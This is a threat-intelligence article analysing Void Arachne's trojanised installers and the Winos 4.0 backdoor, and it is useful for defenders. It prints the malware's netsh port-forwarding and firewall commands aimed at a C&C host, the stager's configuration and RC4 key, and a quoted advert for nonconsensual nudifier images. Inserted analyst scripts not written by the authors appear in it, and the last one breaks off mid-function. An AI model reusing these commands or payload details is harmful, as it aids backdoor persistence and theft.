URL: https://www.trendmicro.com/en_us/research/24/f/behind-the-great-wall-void-arachne-targets-chinese-speaking-user.html
APT & Targeted Attacks


BEHIND THE GREAT WALL: VOID ARACHNE TARGETS CHINESE-SPEAKING USERS WITH THE
WINOS 4.0 C&C FRAMEWORK

We recently discovered a new threat actor group that we dubbed Void Arachne.
This group targets Chinese-speaking users with malicious Windows Installer (MSI)
files in a recent campaign. These MSI files contain legitimate software
installer files for AI software and other popular software but are bundled with
malicious Winos payloads.

By: Peter Girnus, Aliakbar Zahravi, Ahmed Mohamed Ibrahim
June 19, 2024
Read time: 19 min (5015 words)

--------------------------------------------------------------------------------

Report highlights:

 * We recently discovered a new threat actor group that we dubbed Void Arachne.
   This group targets Chinese-speaking users with malicious Windows Installer
   (MSI) files in a recent campaign. These MSI files contain legitimate software
   installer files for AI software and other popular software but are bundled
   with malicious Winos payloads.
 * The campaign also promotes compromised MSI files embedded with nudifiers and
   deepfake pornography-generating software, as well as AI voice and facial
   technologies.
 * The campaign uses SEO poisoning tactics and social media and messaging
   platforms to distribute malware.
 * The malware installs a Winos backdoor during the installation process, which
   could lead to a full system compromise.
 * Due to strict government control in China, VPN services and public interest
   in this technology have notably increased. And in this Void Arachne campaign,
   we’ve observed how threat actors are exploiting the heightened public
   interest in software that can evade the Great Firewall and online censorship.

In early April, we discovered that a new threat actor group (which we call Void
Arachne) was targeting Chinese-speaking users. Void Arachne’s campaign involves
the use of malicious MSI files that contain legitimate software installer files
for artificial intelligence (AI) software as well as other popular software. The
malicious Winos payloads are bundled alongside nudifiers and deepfake
pornography-generating AI software, voice-and-face-swapping AI software, zh-CN
(Simplified Chinese) language packs, the simplified Chinese version of Google
Chrome, and Chinese-marketed virtual private networks (VPNs), such as LetsVPN
and QuickVPN. During the process of installation, a Winos backdoor is also
installed, which could also lead to full system compromise.


During this campaign, we observed numerous malicious installer files being
shared across several Telegram channels. We also saw attacker-controlled web
servers that distribute malicious files through search engine optimization (SEO)
poisoning attacks. These MSI files act as backdoored installers, serving both
the non-malicious software and the Winos 4.0 command-and-control (C&C) framework
implant, which could lead to a full system compromise. Winos (not to be confused
with the Windows operating system) is a backdoor used by Chinese threat actors
with an extensive array of capabilities for remotely controlling a compromised
computer.


ATTACK DIAGRAM

We observed multiple initial access vectors that the Void Arachne threat actor
group uses to distribute malware across the web and through social media
platforms. These distribution methods include an infrastructure staged for SEO
poisoning and malicious package distribution across Chinese-language-themed
Telegram channels.

Figure 1. The Void Arachne campaign attack diagram


INITIAL ACCESS


SEO POISONING (T1608.006)

For this campaign, Void Arachne set up a web infrastructure used for SEO
poisoning that deployed spear-phishing links (T1566.002) disguised as legitimate
software installers to lure potential victims. These links are hosted on web
servers disguised as legitimate websites, which the Void Arachne threat group
then pushes to rank highly in search engine results via SEO poisoning.

Figure 2. An attacker-controlled website that hosts a malicious payload

These links point to MSI installers for software commonly used by
Chinese-speaking users, such as Google Chrome, Chinese language packs for popular
software, and VPNs such as LetsVPN and 快連VPN (also known as Quick VPN or
Kuailian VPN). When these malicious MSI files or archive files are downloaded
and executed, they bootstrap the infection process. To the victim, it appears as
if the intended software was installed. However, unbeknownst to them, additional
malware is installed that beacons back to the attacker’s C&C server.

Because MSI files are bundled software installers, threat actors can include
backdoors and additional malware within the file bundle that are executed
without the end user’s knowledge during the installation process.

In this campaign, the Void Arachne group created subdomains of the domain
webcamcn[.]xyz to act as C&C servers for the various MSI files. As the campaign
progressed, further subdomains were added under this root domain.


TARGETING VPN-RELATED TECHNOLOGIES FOR SPEARPHISHING

Internet connectivity in the People’s Republic of China is subject to strict
regulation through a combination of legislative measures and technological
controls collectively known as the Great Firewall of China. Due to strict
government control, VPN services and public interest in this technology have
notably increased. This has, in turn, enhanced threat actors' interest in
exploiting the heightened public interest in software that can evade the Great
Firewall and online censorship.

Figure 3. VPN advertising services that can “overcome” the Great Firewall of
China

We discovered that the VPN “快連VPN” is a common phishing and SEO poisoning lure
used to target Chinese speakers and the broader East Asian community. We have
evidence of multiple distinct Chinese-speaking threat actors creating
spear-phishing links and using SEO poisoning tactics by bundling this VPN with
malware that includes Gh0st RAT and its variants.


SPEARPHISHING THROUGH TELEGRAM

We observed several Telegram channels, some of which had tens of thousands of
Chinese-speaking users, advertising malicious archives and MSI files as an
additional distribution method. The malicious packages are in what appear to be
Simplified Chinese language packs for Telegram as well as various AI tools.

VPN-RELATED TELEGRAM CHANNELS

As with the files promoted in Void Arachne’s SEO poisoning campaign, we also
observed the same malicious MSI files being shared in Chinese-language Telegram
channels. These channels are all related to VPN technology, and the malicious
MSI files were shared across several of them.

Figure 4. A pinned Telegram message containing a malicious MSI file embedded in
a zip file

This mirrors other campaigns we’ve observed in which threat actors, after
carrying out SEO poisoning, share links to the malicious sites or upload the
related files on social media and messaging applications.

MALICIOUS SIMPLIFIED CHINESE LANGUAGE PACKS FOR TELEGRAM

A common malicious software package we observed is what appears to be a Telegram
language pack for Simplified Chinese. (Telegram itself does offer an official
Simplified Chinese translation of its app.)

Figure 5. A malicious MSI file masquerading as a Simplified Chinese language
pack for Telegram

Using infected language packs as an infection vector is an interesting method,
especially for the Chinese language, which has an estimated 1.3 billion native
speakers. Some applications require language packs for a more localized user
experience in regional markets, leaving these users potentially vulnerable to
this kind of attack.

NUDIFIER AI TECHNOLOGIES PROMOTED ON TELEGRAM CHANNELS

A concerning trend we have recently observed is the mass proliferation of
nudifier applications that abuse AI to create nonconsensual deepfake
pornography. These images and videos are often used in sextortion schemes for
further abuse, victim harassment, and financial gain.

Figure 6. A deepfake pornographic video sample shared on the threat actor’s
Telegram channel

Figure 6 shows a screenshot of a video on the Void Arachne Telegram channel in
which a photo of a woman was used to generate a deepfake pornographic video
using AI technology.

Figure 7. An infected nudifier application shared on the Void Arachne Telegram
channel

We’ve observed that the threat actors pinned the malicious MSI file to the top
of their Telegram channels to increase the chances of infecting users who are
interested in using this type of technology.

Figure 8. A pinned message on Void Arachne’s Telegram channel featuring a
malicious MSI file for an AI-powered app

The malicious installer files are advertised on social media and Telegram
channels and are intended to lure unsuspecting victims, potentially even minors.
Based on an initial Simplified Chinese to English translation of their
advertisement via Google Translate, the malicious actors are also targeting
young individuals who are still in school with their use of the phrase “female
classmate.”

Just have appropriate entertainment and satisfy your own lustful desires. Do not
send it to the other party or harass the other party. Once you call the police,
you will be in constant trouble! AI takes off clothes, you give me photos and I
will make pictures for you. Do you want to see the female classmate you yearn
for, the female colleague you have a crush on, the relatives and friends you eat
and live with at home? Do you want to see them naked? Now you can realize your
dream, you can see them naked and lustful for a pack of cigarette money.

A Simplified Chinese to English translation of an advertisement that promotes
nudifiers or deepfake pornography-generating software on the threat actor’s
Telegram channel

Void Arachne also advertised AI technologies that could be used for virtual
kidnapping, a novel deception scheme that uses misinformation produced with AI
voice-altering technology to pressure victims into paying a ransom.

VOICE-ALTERING AND FACE-SWAPPING AI TECHNOLOGIES PROMOTED ON TELEGRAM

In addition to fake nudifier applications, we saw additional channels
advertising face-swapping and voice-changing software. Like the rise of
nudifiers and deepfake-generating applications, we have also observed the rise
of AI-powered apps that have face-swapping and voice-altering capabilities.

Figure 9. A screenshot of the Void Arachne Telegram channel advertising
face-swapping applications

We’ve found that malicious MSI files were shared and pinned on various AI video
and voice manipulation Telegram channels.

Figure 10 shows a screen capture of a threat actor video posted on Void
Arachne’s Telegram channel wherein the malicious actor can be seen using AI
face- and voice-cloning technology on a WhatsApp call. Figure 11, on the other
hand, shows a malicious voice-altering and face-swapping AI app installer on
Telegram.

Figure 10. A screen capture of a video posted on a Telegram channel wherein the
threat actor uses AI face- and voice-cloning technology on a WhatsApp call

Figure 11. An infected voice-changing and face-swapping AI app installer on
Telegram


TECHNICAL ANALYSIS


LETVPN MSI ANALYSIS

Name: Letvpn.msi
SHA256: fae4f96beda54a1ed4914537b0542182d3a020dd9db9d9995df37d303b88e6df
Size: 27.05 MB
Type: Windows Installer

This section discusses our analysis of the malicious files associated with Void
Arachne’s campaign, starting with the letvpn.msi file.

The malicious MSI file uses Dynamic Link Libraries (DLLs) during the
installation process. These DLLs play a pivotal role during runtime,
facilitating various essential operations including property management within
MSI packages, scheduling tasks, and configuring firewall rules.

Figure 12. MSI binary table that shows embedded DLLs
Figure 13. MSI action table

The MSI file performs several tasks, such as creating scheduled tasks and
configuring firewall parameters. Specifically, we have observed the creation and
configuration of firewall rules via the OnFwConfig and OnFwInstall functions
from NetFirewall.dll, which are designed to whitelist both inbound and outbound
traffic associated with the malware for the public network profile only.

Figure 14. Firewall rule addition
Figure 15. Firewall rule creation

Figure 16 shows the configuration of the inbound firewall rule created to enable
unrestricted access for the malware when connected to public networks, ensuring
that the malware can operate without interruption.

Figure 16. Inbound firewall rule configuration

Furthermore, letvpn.msi drops multiple hidden files, including the LetsPro.exe
loader, within the designated directory path C:\Program Files (x86)\Common
Files\Microsoft Shared\. Subsequently, it initiates the execution of the LetsPRO
loader.

File name            | Size    | MD5 hash                         | Parent directory
---------------------|---------|----------------------------------|------------------------------------------------------------------
1                    | 9996288 | D82362C15DDB7206010B8FCEC7F611C5 | C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0
LetsPRO.exe (Loader) | 40960   | FE7AEDAB70A5A58EFB84E6CB988D67A4 | C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0
LetsPRO.exe          | 247272  | 7BB188DFEE179CBDE884A0E7D127B074 | C:\Program Files (x86)\Common Files\Microsoft Shared\VGX

Table 1. Sample of files dropped by LetsPro.msi


TROJAN LOADER LETSPRO.EXE ANALYSIS

Name: LetsPRO.exe
SHA256: 768881a43d2ffd9701bf2e241a1d59d8a0c116cf20e27a632a8b087bb81de409
Compilation time: 2024-02-03 3:59:52 a.m.
Size: 40.00 KB
Compiler: Microsoft Visual C/C++ (2003 v.7.1 (3052-9782)) [EXE32]
Type: EXE

LetsPro.exe is a trojan loader that decrypts, maps, and executes a second-stage
payload in memory. The loader first reads and loads the content of a file named
“1”, with the following content structure:

#include <stdint.h>

struct payload_struct {
    uint32_t flag;            // 1 if the data is encrypted, 0 if it is plaintext / memory clean-up
    uint32_t fileSize;        // Size of the encrypted data in bytes
    char     encryptedData[]; // The encrypted payload (flexible array member, fileSize bytes long)
};

Figure 17. File 1 content structure

It then identifies the encrypted data section within the file. The initial part
of the file structure contains a flag set to 1, which indicates encryption. The
loader uses the Rivest Cipher 4 (RC4) algorithm with the key "0x678E0B00" to
decrypt this data. After decryption, the payload, which is now executable code,
is mapped into the process's memory space and executed.

The decryption key structure is defined as follows:

struct decryption_key_struct {
    uint32_t memory_cleanup; // Flag for memory cleanup after decryption
    uint32_t keySize;        // Size of the decryption key in bytes
    char     key[];          // Decryption key (flexible array member, keySize bytes long)
};

The following code snippet demonstrates the core part of the loader logic:

Figure 18. LetsPro.exe core logic

The following snippet demonstrates the decrypted file 1 structure in memory:

Figure 19. File 1 decrypted content structure in memory
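As an added example (not the loader's own code and not provided by the authors), the following Python script reproduces the file "1" handling described above from an analyst's side: it parses the flag/fileSize header, checks that the body is really present, and RC4-decrypts the body when the flag is 1. The RC4 routine is written inline so the script runs offline. Two points are assumptions rather than facts from the article: the header fields are read as little-endian, and the key "0x678E0B00" is treated as the little-endian bytes of that 32-bit value (the article does not say whether the key is binary or an ASCII string). The sample payload is constructed for the demonstration.

```python
"""Parse LetsPRO's file "1" header and RC4-decrypt its payload (added example)."""
import struct

# uint32 flag, uint32 fileSize; little-endian byte order is an ASSUMPTION.
HEADER = struct.Struct("<II")


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (KSA + PRGA). RC4 is symmetric: the same call encrypts and decrypts."""
    S = list(range(256))
    j = 0
    for i in range(256):  # key-scheduling algorithm
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for byte in data:     # pseudo-random generation algorithm
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def parse_payload_file(blob: bytes, key: bytes) -> bytes:
    """Return the plaintext second-stage payload from a file "1" image.

    Layout per the article: uint32 flag (1 = encrypted, 0 = plaintext),
    uint32 fileSize, then fileSize bytes of data.
    """
    if len(blob) < HEADER.size:
        raise ValueError("blob is shorter than the 8-byte header")
    flag, size = HEADER.unpack_from(blob, 0)
    body = blob[HEADER.size:HEADER.size + size]
    if len(body) != size:
        raise ValueError(f"header claims {size} bytes but only {len(body)} are present")
    if flag == 1:
        return rc4(key, body)
    if flag == 0:
        return body
    raise ValueError(f"unexpected flag value {flag:#x}")


def build_payload_file(payload: bytes, key: bytes, encrypted: bool = True) -> bytes:
    """Construct a file "1" image; used only to exercise the parser on sample data."""
    body = rc4(key, payload) if encrypted else payload
    return HEADER.pack(1 if encrypted else 0, len(body)) + body


# ASSUMPTION: the article's key "0x678E0B00" is interpreted as the little-endian
# bytes of that 32-bit value. Swap in b"0x678E0B00" if the key turns out to be ASCII.
RC4_KEY = struct.pack("<I", 0x678E0B00)

# Constructed sample payload standing in for the real 9,996,288-byte second stage.
SAMPLE_PAYLOAD = b"MZ\x90\x00constructed-second-stage-stub"

if __name__ == "__main__":
    image = build_payload_file(SAMPLE_PAYLOAD, RC4_KEY)
    print(parse_payload_file(image, RC4_KEY))
```

On a real triage image, read the dropped file "1" from the VGX\app-3.4.0 directory into `blob` and pass the key bytes recovered from the loader's decryption_key_struct; a wrong key interpretation shows up immediately because the decrypted output will not start with a PE header.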


SECOND-STAGE LOADER ANALYSIS

SHA256: 77c77e728b98a923bb057943d0b5765b79106c0378d72814cb3db69749abaebb
Size: 15.77 MB
Compilation time: 2024-05-11 08:02:23
Type: DLL

After the second-stage loader (file “1”) is executed and loaded into memory, the
malware drops a Visual Basic Script (VBScript) designed to automate the creation
of a scheduled task within Windows Task Scheduler to achieve persistence. The
VBScript file will create a new scheduled task and configure task settings to
run when a user is logged on to execute a specified batch file. Additionally,
the malware creates a Windows service that starts with CreateSvc_ to execute the
VBScript file. At the time of research, the batch file was not available.

Figure 20. VBScript sets up a scheduled task and configures properties
Figure 21. VBScript adds an action to the scheduled task to execute a BAT file
Figure 22. Scheduled task for executing the BAT file
Figure 23. Service creation for VBScript execution

After that, the malware replicates the loader, VBScript, and the file “1” within
the user directory.

File name   | Size    | MD5                              | Parent directory
------------|---------|----------------------------------|--------------------------------------------
1           | 9996288 | D82362C15DDB7206010B8FCEC7F611C5 | C:\Users\%USERNAME%\<Random Directory Name>
792258.vbs  | 2405    | CD95B5408531DC5342180A1BECE74757 | C:\Users\%USERNAME%\<Random Directory Name>
LetsPRO.exe | 40960   | FE7AEDAB70A5A58EFB84E6CB988D67A4 | C:\Users\%USERNAME%\<Random Directory Name>

Table 2. Sample of files dropped by 1

The malware also uses the netsh command to set up port forwarding and configure
firewall rules named “Safe<integer>” on the victim’s machine, thereby
whitelisting inbound and outbound traffic related to the malware for all network
profiles.

It establishes a rule for IPv4-to-IPv4 port forwarding. Specifically, it
designates port 443 as the listening port on the local machine, where incoming
connections will be received. It specifies a destination address
(103.214.147.14[.]webcamcn[.]xyz), indicating where the forwarded traffic will
be directed. Additionally, it designates port 443 on the destination server as
the port to which the incoming traffic will be forwarded. This configuration
redirects traffic from the local machine's port 443 to the specified destination
address and port.

netsh interface portproxy add v4tov4 listenport=443
connectaddress=103[.]214[.]147[.]14[.]webcamcn[.]xyz connectport=443

Figure 24. Configuring port forwarding

netsh advfirewall firewall add rule name="Safe1" dir=in action=allow program="
C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe"

Figure 25. Configuring firewall rule
Figure 26. List of created firewall rules
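The portproxy entry and the "Safe<integer>" firewall rules described above are host artefacts a responder can sweep for. The following Python script is an added example (not part of the article and not Trend Micro tooling) that parses saved output of `netsh interface portproxy show all` and `netsh advfirewall firewall show rule name=all` and flags entries matching this campaign's pattern. Both sample outputs are constructed for the demonstration and only approximate the real netsh layout; the rule-name pattern and the VGX drop path come from the article.

```python
"""Flag Void Arachne-style netsh artefacts in collected command output (added example)."""
import re

# CONSTRUCTED sample of `netsh interface portproxy show all` output (layout approximated).
PORTPROXY_OUTPUT = """\
Listen on ipv4:             Connect to ipv4:

Address         Port        Address         Port
--------------- ----------  --------------- ----------
*               443         103[.]214[.]147[.]14[.]webcamcn[.]xyz 443
"""

# CONSTRUCTED sample of `netsh advfirewall firewall show rule name=all` output (trimmed).
FIREWALL_OUTPUT = r"""
Rule Name:                            Core Networking - DNS (UDP-Out)
----------------------------------------------------------------------
Enabled:                              Yes
Direction:                            Out

Rule Name:                            Safe1
----------------------------------------------------------------------
Enabled:                              Yes
Direction:                            In
Action:                               Allow
Program:                              C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe
""".strip()

# Rule names of the form Safe1, Safe2, ... as created by the second-stage loader.
SUSPICIOUS_RULE_NAME = re.compile(r"^Safe\d+$")
# Drop directory used by letvpn.msi (compared case-insensitively).
SUSPICIOUS_PROGRAM_DIR = r"microsoft shared\vgx"


def portproxy_entries(output: str):
    """Return (listen_port, connect_address, connect_port) for every portproxy mapping.

    A mapping line has four whitespace-separated fields with numeric ports; header,
    separator and blank lines never match that shape, so they are skipped.
    """
    entries = []
    for line in output.splitlines():
        parts = line.split()
        if len(parts) == 4 and parts[1].isdigit() and parts[3].isdigit():
            entries.append((int(parts[1]), parts[2], int(parts[3])))
    return entries


def suspicious_firewall_rules(output: str):
    """Return names of rules that match Safe<integer> or allow a program under the VGX path."""
    findings = []
    for block in output.split("\n\n"):          # one rule per blank-line-separated block
        fields = {}
        for line in block.splitlines():
            if ":" in line:
                key, value = line.split(":", 1)  # split on the first colon only (paths contain ':')
                fields[key.strip()] = value.strip()
        name = fields.get("Rule Name", "")
        program = fields.get("Program", "")
        if SUSPICIOUS_RULE_NAME.match(name) or SUSPICIOUS_PROGRAM_DIR in program.lower():
            findings.append(name)
    return findings


if __name__ == "__main__":
    print(portproxy_entries(PORTPROXY_OUTPUT))
    print(suspicious_firewall_rules(FIREWALL_OUTPUT))
```

Any portproxy entry at all deserves a look on a workstation, since the feature is rarely used outside server roles; the Safe<integer> name and the VGX program path narrow a hit to this campaign.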

Finally, the malware passes the execution to the Winos 4.0 stager in memory.


WINOS 4.0 C&C FRAMEWORK OVERVIEW

The final payload of this attack is the Winos 4.0 implant, which is written in
C++ and targets the Windows platform. Winos has features that include file
management, distributed denial of service (DDoS) using TCP/UDP/ICMP/HTTP, full
disk search, webcam control, and screen capturing. Additionally, it supports
many functionalities including process injection and microphone recording,
system and service management, remote shell access, and keylogging
functionalities, further enhancing its ability to control and monitor the
infected system.

Figure 27. Winos 4.0 operator panel

The Winos C&C server is equipped with 23 internal plugins, each compiled in both
32- and 64-bit versions, to execute a variety of tasks. Table 3 shows the
complete list of these plugins, along with their respective SHA256 hashes:

Simplified Chinese module name | Translated module name   | SHA256 hash
-------------------------------|--------------------------|-----------------------------------------------------------------
播放监听.dll                   | Play monitor.dll         | 7ed8c7ea5e2feeadb1966f53c48ab3a580f53a4d20725031d764db7e962607a9
查注册表.dll                   | check registry.dll       | 49120dfcef430df1c90c9c370b92b969c876b9b4327d81eae720cd71fcd75b87
差异屏幕.dll                   | difference screen.dll    | 5f7e00017b16db29fa7cba60993d7af909ef41d3fe9d3f7ca9f693c1f7ef6d37
代理映射.dll                   | proxy mapping.dll        | 023822a8ad26f2d7330a2afa310ccf943058f2765b7cbc6975c51c144739b55f
服务管理.dll                   | service management.dll   | 3ac0afec0ce29b69d57c54663c6e4fa6fee703696069cb5b8f00783b5504cf80
高速屏幕.dll                   | high-speed screen.dll    | bc01cf528086de6a1b231dee01c1624cf58911b171904bf7a6b08ddfba661d83
后台屏幕.dll                   | Background Screen.dll    | 2066dd040fe020ca32e5ebfeeb4fa75094d3ac43155c83fe222f380d4940df42
急速搜索.dll                   | Rapid Search.dll         | 5759fc938f228579fc5e64e74cee083581a975d4054deb715c0f371b66b96263
键盘记录.dll                   | Keylogger.dll            | 976837663b25f793470f24925198b06e79a72ede014a84ba62311fadede5062f
上线模块.exe (stager)          | Online Module.dll        | 436499efe94c7a1bfefaa84c52f8187bffb3d4d1a49de1cbc8885e7807d11b42
上线模块.dll (stager)          | Online Module.dll        | 5684fc4f33c168519b2fdcae59cc3be2e6db1f0b0f3718524ef57e0e7423f59d
视频查看.dll                   | Video Viewing.dll        | 7a3841a5315c01df299d8844b62dc150b1c3e5b5ebe7547c1a211349879659af
视频查看.dll                   | Video Surveillance.dll   | 7a3841a5315c01df299d8844b62dc150b1c3e5b5ebe7547c1a211349879659af
文件管理.dll                   | File Management.dll      | 5abc2006c7a3a27e033075ba881a668aba5e70797677ed2220f7ab9fb36fc927
系统管理.dll                   | System Management.dll    | 827ed4f36ea7032395bfa35da54c6e9d06d6633aa7396792e8511adf366c1fcc
远程交谈.dll                   | Remote Communication.dll | c61c8ded2a9481c2e50b4872c8f7bcd8ecc33997a6004e62aa06b60742f54e57
远程终端.dll                   | Remote Terminal.dll      | 409e09ac0fcf7d39044ef0b3eb798aea6dc0650e5214056760694c1340fc8488
注入管理.dll                   | Injection management.dll | ecf5394d78392b11daec1016c6b447f9da7eae69f7702ecf8c4d1d3f69e3fe64
娱乐屏幕.dll                   | Entertainment Screen.dll | 6ce947e21128687ed37f247e297f29609251deed934b7b5722d27f4a1f72a90e
压力测试.dll (DDOS module)     | Stress Test.dll          | 61d73a8920c41483d0832c9a5c5bc9f57ac5f71146a98faefc0cb4d988e77bab
计划任务.dll                   | Scheduled Tasks.dll      | 4791c23aff8a09061b76a05bb88ee37149995584a87aade236ea4eebab79ed1c
登录模块.dll                   | LoginModule.dll          | 16d3c176ca94c84b60e26981231bf59ebe75057ac10dd6f583ce65a3bed11dd0
(shellcode)                    | -                        | b022e0f0b2ae9e27847cfc909bfcdbc89a732fcdde6e473443aaab2592a84910

Table 3. Winos 4.0 internal plugins

Similar to Cobalt Strike and Sliver, Winos supports custom plugins that can be
developed by a threat actor. This allows the tool to extend its capabilities and
add custom functionality. During our investigation, we found the following
external and custom plugins for Winos 4.0 in the wild:

Plugin name in Chinese           | Plugin name in English                          | SHA256 hash
---------------------------------|-------------------------------------------------|-----------------------------------------------------------------
删除360急速安全账号密码.dll      | Delete 360 Speed Security Account Password.dll  | 03669424bdf8241a7ef7f8982cc3d0cf56280a5804f042961f3c6a111252ffd3
提权-EnableDebugPrivilege.dll    | Elevate Privileges-EnableDebugPrivilege.dll     | 11a96c107b8d4254722a35ab9a4d25974819de1ce8aa212e12cae39354929d5f
体积膨胀.dll                     | Volume Expansion.dll                            | 186bf42bf48dc74ef12e369ca533422ce30a85791b6732016de079192f4aac5f
提权ShellExecuteEx.dll           | Elevate Privileges-ShellExecuteEx.dll           | 202c378deb628a8104a1dd957bbd70b945beea8e11d55b9ce3e4787fbe496797
删除sogou账号密码.dll            | Delete Sogou Account Password.dll               | 2d1904dfc5a555b8bfdd4fa2db46d532e19479fd99affb169449ff2a2a4b459a
提权-RtlAdjustPrivilege.dll      | Elevate Privileges-RtlAdjustPrivilege.dll       | 47dfa891fc347187ba4ac161980a7e7c47cf656ddbf7b269a74c32a5a1365d4e
删除ie账号密码.dll               | Delete IE Account Password.dll                  | 538382dc7a7839f125ffe08a854512b78fc4a657697227e53f832ae566ca2505
提权-CreateProcessInSession0.dll | Elevate Privileges-CreateProcessInSession0.dll  | 616c7270a21ecc9ccd880e04563343e9ac53cce88a77244388dbb1fc7bfa4360
写启动目录.dll                   | Write to Startup Directory.dll                  | 61981a0324586ad83e6cb7015df91a6e4887537ad36a4674be82cb3cfcf5b18b
写注册表启动.dll                 | Write to Registry Startup.dll                   | d2e15264c786917a6cb194bf0cf586a69b8678c6d4d4c87cc14082d7b76fe0b2
删除自身.dll                     | Delete Itself.dll                               | 6ece1e12d50ade02bf424007a9b70b4a14580244a9a1f5cd32c0a129ec069d6e
内网主机扫描.dll                 | Internal Network Host Scan.dll                  | 6f5574d00ffce206525835f72ac083692a183e69114f1551b7ecb99dec3d1d19
解密数据.dll                     | Decrypt Data.dll                                | 6f923b94a614e61cbde73c5b09036b9482f3770c02161ecb0875dbb56bc65843
删除chrome账号密码.dll           | Delete Chrome Account Password.dll              | fbc23b84b2c83e99ab1c5cb7075bd5d26b55dde4afc06eddc0471c6d6b2cc5f2
写计划任务.dll                   | Write Scheduled Task.dll                        | 65ac9f036b1d8a02e4c9041eeafc230562088e57f2535bd194e8bf592e62cb06
删除telegram账号密码.dll         | Delete Telegram Account Password.dll            | 2d1904dfc5a555b8bfdd4fa2db46d532e19479fd99affb169449ff2a2a4b459a
删除qq账号密码.dll               | Delete QQ Account Password.dll                  | b71e6c4ff7c910dd666f442e98597f90bd2eb3fce4c8889af0ecc694f282bf64
删除skype账号密码.dll            | Delete Skype Account Password.dll               | b396bfd7bec043cf402e04fa810983c93c79d1a632fd4558098e68eb144abb17

Table 4. Winos 4.0 external plugins


WINOS 4.0 STAGER ANALYSIS

File name: 上线模块.dll (Online Module.dll)
Magic: PE32 executable (DLL)
SHA256: 2962bb303b949e4a0826c723ee4aee2df8cb0806653a8ca6daaa67fd06f37e6f
Compiler: Microsoft Visual C/C++
Compilation time: 2023-05-23 09:24:06
Size: 109 KB
Type: DLL

The second stage loader discussed earlier executes the Winos stager payload,
上线模块.dll/exe (which translates to Online Module.dll/exe). This module can be
generated in both EXE and DLL formats. In this campaign, the attacker delivers a
DLL implant. This module is responsible for downloading and executing the main
implant, 登录模块.dll (which translates to LoginModule.dll), on an infected system.

Upon execution, the stager reads and initializes its configuration. Notably, the
configuration is in cleartext but is arranged in reverse order. The following is
the fixed configuration setup:

|p1:127.0.0.1|o1:443|t1:1|p2:103[.]214[.]147[.]14[.]webcamcn[.]xyz|o2:80|t2:1|p3:103[.]214[.]147[.]14[.]webcamcn[.]xyz|o3:80|t3:0|dd:1|cl:1|fz:默认|bb:1.0|bz:2024. 4.18|jp:0|bh:0|ll:0|dl:0|sh:0|kl:0|bd:0|

Table 5 contains the stager’s configuration values and their descriptions.

Config | Description                                              | Value
-------|----------------------------------------------------------|--------------------------------------
p1     | First C&C address                                        | 127.0.0.1
o1     | First C&C port                                           | 443
t1     | Communication protocol TCP/UDP                           | 1 (TCP)
p2     | Second C&C address                                       | 103[.]214[.]147[.]14[.]webcamcn[.]xyz
o2     | Second C&C port                                          | 80
t2     | Communication protocol TCP/UDP                           | 1 (TCP)
p3     | Third C&C address: backup address in case p1 and p2 fail | 103[.]214[.]147[.]14[.]webcamcn[.]xyz
o3     | Third port                                               | 80
t3     | Communication protocol TCP/UDP                           | 0 (UDP)
dd     | Implant execution delay in seconds                       | 1
cl     | C&C communication interval (beaconing) in seconds        | 1
fz     | Grouping                                                 | 默认 (Default)
bb     | Version                                                  | 1.0
bz     | Comment: default value is implant generation time        | 2024. 4.18
jp     | Keylogger                                                | 0
sx     | Anti-VM                                                  | 0
bh     | End bluescreen                                           | 0
ll     | Antitraffic monitoring                                   | 0
dl     | Entry point                                              | 0
sh     | Process daemon                                           | 0
kl     | Process hollowing                                        | 0
bd     | -                                                        | 0

Table 5. Winos 4.0 stager configuration values and descriptions
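Because the stager configuration is cleartext, an analyst can recover C&C endpoints and enabled features directly from a memory dump or the reversed on-disk string. The Python script below is an added example (not Winos code and not the authors' tooling) that parses the `|key:value|` string quoted above into a dictionary, undoes the reversed storage order when asked to, and lists the C&C endpoints and any feature flags that are switched on. The field meanings are taken from Table 5; the configuration string is the one quoted in the article, kept in its defanged form.

```python
"""Parse the Winos 4.0 stager configuration string (added example, not Winos code)."""

# Field meanings as listed in Table 5 of the article.
FIELD_DESCRIPTIONS = {
    "p1": "first C&C address", "o1": "first C&C port", "t1": "protocol (1=TCP, 0=UDP)",
    "p2": "second C&C address", "o2": "second C&C port", "t2": "protocol (1=TCP, 0=UDP)",
    "p3": "backup C&C address", "o3": "backup C&C port", "t3": "protocol (1=TCP, 0=UDP)",
    "dd": "execution delay (s)", "cl": "beacon interval (s)", "fz": "grouping",
    "bb": "version", "bz": "comment / generation time", "jp": "keylogger", "sx": "anti-VM",
    "bh": "end bluescreen", "ll": "anti-traffic-monitoring", "dl": "entry point",
    "sh": "process daemon", "kl": "process hollowing", "bd": "unknown",
}
# Boolean feature switches; "1" means enabled.
FEATURE_FLAGS = ("jp", "sx", "bh", "ll", "dl", "sh", "kl")

# Cleartext configuration quoted in the article (defanged form kept as-is).
CLEARTEXT_CONFIG = (
    "|p1:127.0.0.1|o1:443|t1:1|p2:103[.]214[.]147[.]14[.]webcamcn[.]xyz|o2:80|t2:1"
    "|p3:103[.]214[.]147[.]14[.]webcamcn[.]xyz|o3:80|t3:0|dd:1|cl:1|fz:默认|bb:1.0"
    "|bz:2024. 4.18|jp:0|bh:0|ll:0|dl:0|sh:0|kl:0|bd:0|"
)


def parse_config(raw: str, stored_reversed: bool = False) -> dict:
    """Turn '|key:value|...' into a dict.

    The stager keeps the string reversed in memory; pass stored_reversed=True
    when feeding it the raw form so it is flipped back before parsing.
    """
    text = raw[::-1] if stored_reversed else raw
    fields = {}
    for item in text.strip("|").split("|"):
        if ":" not in item:
            raise ValueError(f"malformed config item: {item!r}")
        key, value = item.split(":", 1)   # first colon only; values may contain ':'
        fields[key] = value
    return fields


def c2_endpoints(fields: dict):
    """Return (address, port, protocol) for p1..p3, in the order the stager tries them."""
    endpoints = []
    for n in (1, 2, 3):
        address = fields.get(f"p{n}")
        if not address:
            continue
        protocol = "TCP" if fields.get(f"t{n}") == "1" else "UDP"
        endpoints.append((address, int(fields[f"o{n}"]), protocol))
    return endpoints


def enabled_features(fields: dict):
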